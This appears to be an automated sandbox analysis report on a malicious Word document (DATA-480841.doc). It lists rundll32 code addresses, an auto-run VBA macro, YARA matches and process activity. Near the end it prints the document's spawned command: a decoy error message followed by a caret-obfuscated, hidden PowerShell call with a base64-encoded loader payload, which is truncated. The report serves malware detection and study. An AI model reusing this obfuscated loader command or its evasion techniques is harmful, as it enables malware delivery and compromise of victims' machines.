Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E511B 10_2_001E511B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E2B16 10_2_001E2B16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DB112 10_2_001DB112
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E0F0C 10_2_001E0F0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E7D03 10_2_001E7D03
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D153C 10_2_001D153C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DBB3A 10_2_001DBB3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DF536 10_2_001DF536
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E0D33 10_2_001E0D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DB75F 10_2_001DB75F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D6754 10_2_001D6754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E2349 10_2_001E2349
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E8F49 10_2_001E8F49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E9B45 10_2_001E9B45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D5B79 10_2_001D5B79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D8F78 10_2_001D8F78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DE377 10_2_001DE377
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E1773 10_2_001E1773
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DC769 10_2_001DC769
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E0B68 10_2_001E0B68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D839D 10_2_001D839D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D6D9F 10_2_001D6D9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D7998 10_2_001D7998
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E878F 10_2_001E878F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DF98C 10_2_001DF98C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E9586 10_2_001E9586
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E61B8 10_2_001E61B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E6DB9 10_2_001E6DB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D17AC 10_2_001D17AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E73AC 10_2_001E73AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D69A0 10_2_001D69A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E1BDF 10_2_001E1BDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D9FDC 10_2_001D9FDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E71EF 10_2_001E71EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DD7EB 10_2_001DD7EB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E67E9 10_2_001E67E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E3FE7 10_2_001E3FE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E31E2 10_2_001E31E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004B2C63 11_2_004B2C63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004BEE78 11_2_004BEE78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004BB41F 11_2_004BB41F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004BC0C6 11_2_004BC0C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C02C3 11_2_004C02C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C42DA 11_2_004C42DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004B568E 11_2_004B568E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C3895 11_2_004C3895
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C4B41 11_2_004C4B41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004B7B63 11_2_004B7B63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004B8736 11_2_004B8736
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C63C1 11_2_004C63C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004BEA4C 11_2_004BEA4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004BF444 11_2_004BF444
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004BE05A 11_2_004BE05A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C5A61 11_2_004C5A61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C687F 11_2_004C687F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C7A0F 11_2_004C7A0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C340A 11_2_004C340A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004B2A30 11_2_004B2A30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004B9A37 11_2_004B9A37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004B4A35 11_2_004B4A35
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004B96CD 11_2_004B96CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C20C5 11_2_004C20C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C8ADC 11_2_004C8ADC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004B88E5 11_2_004B88E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C12E2 11_2_004C12E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004B1CFA 11_2_004B1CFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C26F5 11_2_004C26F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004B1280 11_2_004B1280
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C889D 11_2_004C889D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004CA0AF 11_2_004CA0AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004B62A3 11_2_004B62A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004B80BA 11_2_004B80BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004B60B9 11_2_004B60B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004B48BD 11_2_004B48BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C8F49 11_2_004C8F49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C2349 11_2_004C2349
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C9B45 11_2_004C9B45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004BB75F 11_2_004BB75F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004B6754 11_2_004B6754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004BC769 11_2_004BC769
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C0B68 11_2_004C0B68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004B5B79 11_2_004B5B79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004B8F78 11_2_004B8F78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004BE377 11_2_004BE377
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C1773 11_2_004C1773
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C0F0C 11_2_004C0F0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C7D03 11_2_004C7D03
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C8D1C 11_2_004C8D1C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C5D1D 11_2_004C5D1D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C7F1F 11_2_004C7F1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C511B 11_2_004C511B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004BB112 11_2_004BB112
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C2B16 11_2_004C2B16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004BBB3A 11_2_004BBB3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004B153C 11_2_004B153C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004BF536 11_2_004BF536
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C0D33 11_2_004C0D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C1BDF 11_2_004C1BDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004B9FDC 11_2_004B9FDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004BD7EB 11_2_004BD7EB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C71EF 11_2_004C71EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C67E9 11_2_004C67E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C3FE7 11_2_004C3FE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C31E2 11_2_004C31E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C878F 11_2_004C878F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004BF98C 11_2_004BF98C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C9586 11_2_004C9586
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004B7998 11_2_004B7998
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004B6D9F 11_2_004B6D9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004B839D 11_2_004B839D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C73AC 11_2_004C73AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004B17AC 11_2_004B17AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004B69A0 11_2_004B69A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C61B8 11_2_004C61B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004C6DB9 11_2_004C6DB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007DEE78 12_2_007DEE78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007D2C63 12_2_007D2C63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007DB41F 12_2_007DB41F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E42DA 12_2_007E42DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007DC0C6 12_2_007DC0C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E02C3 12_2_007E02C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E3895 12_2_007E3895
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007D568E 12_2_007D568E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007D7B63 12_2_007D7B63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E4B41 12_2_007E4B41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007D8736 12_2_007D8736
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E63C1 12_2_007E63C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E687F 12_2_007E687F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E5A61 12_2_007E5A61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007DE05A 12_2_007DE05A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007DEA4C 12_2_007DEA4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007DF444 12_2_007DF444
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007D4A35 12_2_007D4A35
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007D9A37 12_2_007D9A37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007D2A30 12_2_007D2A30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E7A0F 12_2_007E7A0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E340A 12_2_007E340A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007D1CFA 12_2_007D1CFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E26F5 12_2_007E26F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007D88E5 12_2_007D88E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E12E2 12_2_007E12E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E8ADC 12_2_007E8ADC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007D96CD 12_2_007D96CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E20C5 12_2_007E20C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007D48BD 12_2_007D48BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007D60B9 12_2_007D60B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007D80BA 12_2_007D80BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007EA0AF 12_2_007EA0AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007D62A3 12_2_007D62A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E889D 12_2_007E889D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007D1280 12_2_007D1280
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007D5B79 12_2_007D5B79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007D8F78 12_2_007D8F78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007DE377 12_2_007DE377
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E1773 12_2_007E1773
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007DC769 12_2_007DC769
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E0B68 12_2_007E0B68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007DB75F 12_2_007DB75F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007D6754 12_2_007D6754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E2349 12_2_007E2349
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E8F49 12_2_007E8F49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E9B45 12_2_007E9B45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007D153C 12_2_007D153C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007DBB3A 12_2_007DBB3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007DF536 12_2_007DF536
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E0D33 12_2_007E0D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E7F1F 12_2_007E7F1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E8D1C 12_2_007E8D1C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E5D1D 12_2_007E5D1D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E511B 12_2_007E511B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E2B16 12_2_007E2B16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007DB112 12_2_007DB112
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E0F0C 12_2_007E0F0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E7D03 12_2_007E7D03
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E71EF 12_2_007E71EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007DD7EB 12_2_007DD7EB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E67E9 12_2_007E67E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E3FE7 12_2_007E3FE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E31E2 12_2_007E31E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E1BDF 12_2_007E1BDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007D9FDC 12_2_007D9FDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E61B8 12_2_007E61B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E6DB9 12_2_007E6DB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007D17AC 12_2_007D17AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E73AC 12_2_007E73AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007D69A0 12_2_007D69A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007D839D 12_2_007D839D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007D6D9F 12_2_007D6D9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007D7998 12_2_007D7998
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E878F 12_2_007E878F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007DF98C 12_2_007DF98C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007E9586 12_2_007E9586
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0026B41F 13_2_0026B41F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00262C63 13_2_00262C63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0026EE78 13_2_0026EE78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0026568E 13_2_0026568E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00273895 13_2_00273895
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0026C0C6 13_2_0026C0C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002702C3 13_2_002702C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002742DA 13_2_002742DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00268736 13_2_00268736
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00267B63 13_2_00267B63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00274B41 13_2_00274B41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002763C1 13_2_002763C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00269A37 13_2_00269A37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00264A35 13_2_00264A35
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00262A30 13_2_00262A30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00277A0F 13_2_00277A0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0027340A 13_2_0027340A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00275A61 13_2_00275A61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0027687F 13_2_0027687F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0026F444 13_2_0026F444
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0026EA4C 13_2_0026EA4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0026E05A 13_2_0026E05A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002662A3 13_2_002662A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0027A0AF 13_2_0027A0AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002648BD 13_2_002648BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002680BA 13_2_002680BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002660B9 13_2_002660B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00261280 13_2_00261280
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0027889D 13_2_0027889D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002688E5 13_2_002688E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002712E2 13_2_002712E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002726F5 13_2_002726F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00261CFA 13_2_00261CFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002720C5 13_2_002720C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002696CD 13_2_002696CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00278ADC 13_2_00278ADC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0026F536 13_2_0026F536
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: DATA-480841.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module A5gd21klfqu9c6rs, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: DATA-480841.doc OLE indicator, VBA macros: true
Yara signature match
Source: 00000005.00000002.2107717841.0000000001CA6000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2107604650.00000000003D6000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: rundll32.exe, 00000006.00000002.2116157944.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110481704.00000000020A0000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@26/8@7/5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00211C88 CreateToolhelp32Snapshot, 15_2_00211C88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002D70 SysAllocString,CoCreateInstance,PropVariantClear,SysFreeString,SysFreeString, 7_2_10002D70
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$TA-480841.doc Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRDA28.tmp Jump to behavior
Source: DATA-480841.doc OLE indicator, Word Document stream: true
Source: DATA-480841.doc OLE document summary: title field not present or empty
Source: DATA-480841.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe Console Write: ............K........................... .Y.......Y.....................H...............#...............................h.......5kU............. Jump to behavior
Source: C:\Windows\System32\msg.exe Console Write: ............K...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K........u............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................T..j....................................}..v.....s......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................T..j..... ..............................}..v....0t......0.................u............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....h.u.............................}..v............0.................u............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j....................................}..v....0.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j..... ..............................}..v............0...............8.u............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'...............t..j....E...............................}..v.....N......0...............h.u............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....+...............t..j....E...............................}..v....P.......0...............h.u............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
Source: DATA-480841.doc Virustotal: Detection: 59%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdg